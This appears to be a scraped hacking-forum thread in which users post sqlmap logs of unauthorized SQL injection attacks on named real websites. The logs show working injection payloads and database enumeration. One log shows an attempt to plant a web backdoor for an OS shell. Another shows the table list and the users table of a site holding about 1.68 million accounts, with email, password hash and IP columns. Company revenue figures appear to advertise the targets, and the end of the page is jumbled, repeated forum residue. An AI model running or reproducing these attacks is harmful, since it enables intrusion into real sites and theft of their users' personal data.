aj_com
[14:04:08] [INFO] retrieved: test
[14:04:51] [INFO] retrieved: tes
[14:05:26] [ERROR] invalid character detected. retrying..
t_sand
[14:06:32] [ERROR] invalid character detected. retrying..
stormgold_com
available databases [4]:
[*] firstmaj_com
[*] information_schema
[*] test
[*] test_sandstormgold_com

[14:08:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/firstmajestic.com'

[*] ending @ 14:08:29 /2025-11-17/

(myenv) root@D04S16:~/gd/extract# sqlmap -u "https://firstmajestic.com/ajax/"        --data="email=testing@example.com&g-recaptcha-response=1&name=qeNtfPNC&submit="        -p name        --batch        --level=3        --risk=2        --dbms=mysql        --technique=T        --time-sec=1        --threads=10        --dbs --os-shell
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.10#pip}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:11:07 /2025-11-17/

[14:11:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=testing@example.com&g-recaptcha-response=1&name=qeNtfPNC' AND (SELECT 5171 FROM (SELECT(SLEEP(1)))AIxl) AND 'GlNU'='GlNU&submit=
---
[14:11:08] [INFO] testing MySQL
[14:11:32] [INFO] confirming MySQL
[14:11:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[14:11:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 8.0.0 (MariaDB fork)
[14:11:35] [INFO] fetching database names
[14:11:35] [INFO] fetching number of databases
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[14:11:35] [INFO] resumed: 4
[14:11:35] [INFO] resumed: information_schema
[14:11:35] [INFO] resumed: firstmaj_com
[14:11:35] [INFO] resumed: test
[14:11:35] [INFO] resumed: test_sandstormgold_com
available databases [4]:
[*] firstmaj_com
[*] information_schema
[*] test
[*] test_sandstormgold_com

[14:11:35] [INFO] going to use a web backdoor for command prompt
[14:11:35] [INFO] fingerprinting the back-end DBMS operating system
[14:11:36] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] Y
[14:11:36] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[14:11:36] [WARNING] unable to automatically parse any web server path
[14:11:36] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[14:11:38] [WARNING] potential CAPTCHA protection mechanism detected
[14:11:39] [WARNING] unable to upload the file stager on '/var/www/'
[14:11:39] [INFO] trying to upload the file stager on '/var/www/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:11:42] [WARNING] unable to upload the file stager on '/var/www/ajax/'
[14:11:42] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[14:11:47] [WARNING] unable to upload the file stager on '/var/www/html/'
[14:11:47] [INFO] trying to upload the file stager on '/var/www/html/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:11:52] [WARNING] unable to upload the file stager on '/var/www/html/ajax/'
[14:11:52] [INFO] trying to upload the file stager on '/var/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[14:11:56] [WARNING] unable to upload the file stager on '/var/www/htdocs/'
[14:11:56] [INFO] trying to upload the file stager on '/var/www/htdocs/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:12:01] [WARNING] unable to upload the file stager on '/var/www/htdocs/ajax/'
[14:12:01] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[14:12:07] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[14:12:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:12:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/ajax/'
[14:12:13] [INFO] trying to upload the file stager on '/usr/local/www/data/' via LIMIT 'LINES TERMINATED BY' method
[14:12:19] [WARNING] unable to upload the file stager on '/usr/local/www/data/'
[14:12:19] [INFO] trying to upload the file stager on '/usr/local/www/data/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:12:25] [WARNING] unable to upload the file stager on '/usr/local/www/data/ajax/'
[14:12:25] [INFO] trying to upload the file stager on '/var/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[14:12:29] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/'
[14:12:29] [INFO] trying to upload the file stager on '/var/apache2/htdocs/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:12:34] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/ajax/'
[14:12:34] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[14:12:39] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[14:12:39] [INFO] trying to upload the file stager on '/var/www/nginx-default/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:12:44] [WARNING] unable to upload the file stager on '/var/www/nginx-default/ajax/'
[14:12:44] [INFO] trying to upload the file stager on '/srv/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[14:12:48] [WARNING] unable to upload the file stager on '/srv/www/htdocs/'
[14:12:48] [INFO] trying to upload the file stager on '/srv/www/htdocs/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:12:53] [WARNING] unable to upload the file stager on '/srv/www/htdocs/ajax/'
[14:12:53] [INFO] trying to upload the file stager on '/usr/local/var/www/' via LIMIT 'LINES TERMINATED BY' method
[14:12:58] [WARNING] unable to upload the file stager on '/usr/local/var/www/'
[14:12:58] [INFO] trying to upload the file stager on '/usr/local/var/www/ajax/' via LIMIT 'LINES TERMINATED BY' method
[14:13:04] [WARNING] unable to upload the file stager on '/usr/local/var/www/ajax/'
[14:13:04] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 74 times
[14:13:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/firstmajestic.com'

[*] ending @ 14:13:04 /2025-11-17/

D4rk1337 · 03.01.2026

MrDark сказал(а):

Database: heradb
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 1677367 |
+-------+---------+

Код:

(myenv) root@E02S29:~# sqlmap -u "https://hentaiera.com/search/?key=key" --level=3 --risk=2 --dbs --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:23:57 /2025-09-13/

[01:23:57] [INFO] resuming back-end DBMS 'mysql'
[01:23:57] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=i5m3c9lk9n4...i7g4s9ve2o'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: key=test' AND 5830=(SELECT (CASE WHEN (5830=5830) THEN 5830 ELSE (SELECT 5823 UNION SELECT 5168) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: key=test' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x71717a7171,(SELECT (ELT(9211=9211,1))),0x71626a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qwNy'='qwNy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: key=test' AND (SELECT 1578 FROM (SELECT(SLEEP(5)))doFV) AND 'HPDy'='HPDy
---
[01:23:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:23:59] [INFO] fetching database names
[01:23:59] [INFO] resumed: 'information_schema'
[01:23:59] [INFO] resumed: 'mysql'
[01:23:59] [INFO] resumed: 'performance_schema'
[01:23:59] [INFO] resumed: 'heradb'
[01:23:59] [INFO] resumed: 'dev'
available databases [5]:
[*] dev
[*] heradb
[*] information_schema
[*] mysql
[*] performance_schema

[01:23:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hentaiera.com'

[*] ending @ 01:23:59 /2025-09-13/

(myenv) root@E02S29:~# sqlmap -u "https://hentaiera.com/search/?key=key" --level=3 --risk=2 --batch -D heradb --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 01:24:23 /2025-09-13/

[01:24:23] [INFO] resuming back-end DBMS 'mysql'
[01:24:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=7q2d18iv5ts...612c8e6d8h'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: key=test' AND 5830=(SELECT (CASE WHEN (5830=5830) THEN 5830 ELSE (SELECT 5823 UNION SELECT 5168) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: key=test' AND (SELECT 9211 FROM(SELECT COUNT(*),CONCAT(0x71717a7171,(SELECT (ELT(9211=9211,1))),0x71626a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qwNy'='qwNy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: key=test' AND (SELECT 1578 FROM (SELECT(SLEEP(5)))doFV) AND 'HPDy'='HPDy
---
[01:24:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:24:25] [INFO] fetching tables for database: 'heradb'
Database: heradb
[32 tables]
+----------------------+
| groups               |
| artists              |
| categories           |
| characters           |
| coins_cap            |
| coins_history        |
| comments             |
| content_filter       |
| data_tags            |
| downloads            |
| fap_list             |
| favorites            |
| galleries            |
| galleries_info       |
| invoices             |
| languages            |
| notifications        |
| notifications_custom |
| pairing              |
| parodies             |
| pass_reset           |
| search_filter        |
| shop_items           |
| shop_list            |
| subs_status          |
| tags                 |
| users                |
| users_artists        |
| users_blacklist      |
| users_details        |
| users_premium        |
| vote_list            |
+----------------------+

[01:24:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hentaiera.com'

[*] ending @ 01:24:25 /2025-09-13/

Database: heradb
Table: users
[12 columns]
+-----------------+---------------------+
| Column          | Type                |
+-----------------+---------------------+
| status          | tinyint(3) unsigned |
| coins           | int(10) unsigned    |
| email           | varchar(255)        |
| id              | mediumint(9)        |
| last_login_date | datetime            |
| login_ip        | varchar(255)        |
| password        | varchar(255)        |
| registered_date | datetime            |
| registered_ip   | varchar(255)        |
| rmb_me_expiry   | datetime            |
| rmb_me_token    | varchar(64)         |
| username        | varchar(255)        |
+-----------------+---------------------+

nice one , cheers mate

SQL injections and other vulnerabilities that I find and have no use with it

MrDark

Bratva

MrDark

Bratva

108111118101

HDD-drive

MrDark

Bratva

MrDark

Bratva

MrDark

Bratva

MrDark

Bratva

кекич

RAID-массив

etc/passwd

(L3) cache

MrDark

Bratva

MrDark

Bratva

Cathedra Bitcoin

MrDark

Bratva

MrDark

Bratva

Website www.opovo.com.br

Revenue $213.7 Million

MrDark

Bratva

Website www.firstmajestic.com

Revenue $514.8 Million

https://www.zoominfo.com/c/first-majestic-silver-corp/33950796

D4rk1337

CD-диск

SQL injections and other vulnerabilities that I find and have no use with it

Bratva

Bratva

HDD-drive

Bratva

Bratva

Bratva

Bratva

RAID-массив

(L3) cache

Bratva

Bratva

Bratva

Bratva

Website www.opovo.com.br​

Revenue $213.7 Million​

Bratva

Website www.firstmajestic.com​

Revenue $514.8 Million​

https://www.zoominfo.com/c/first-majestic-silver-corp/33950796 ​

CD-диск

Website www.opovo.com.br

Revenue $213.7 Million

Website www.firstmajestic.com

Revenue $514.8 Million

https://www.zoominfo.com/c/first-majestic-silver-corp/33950796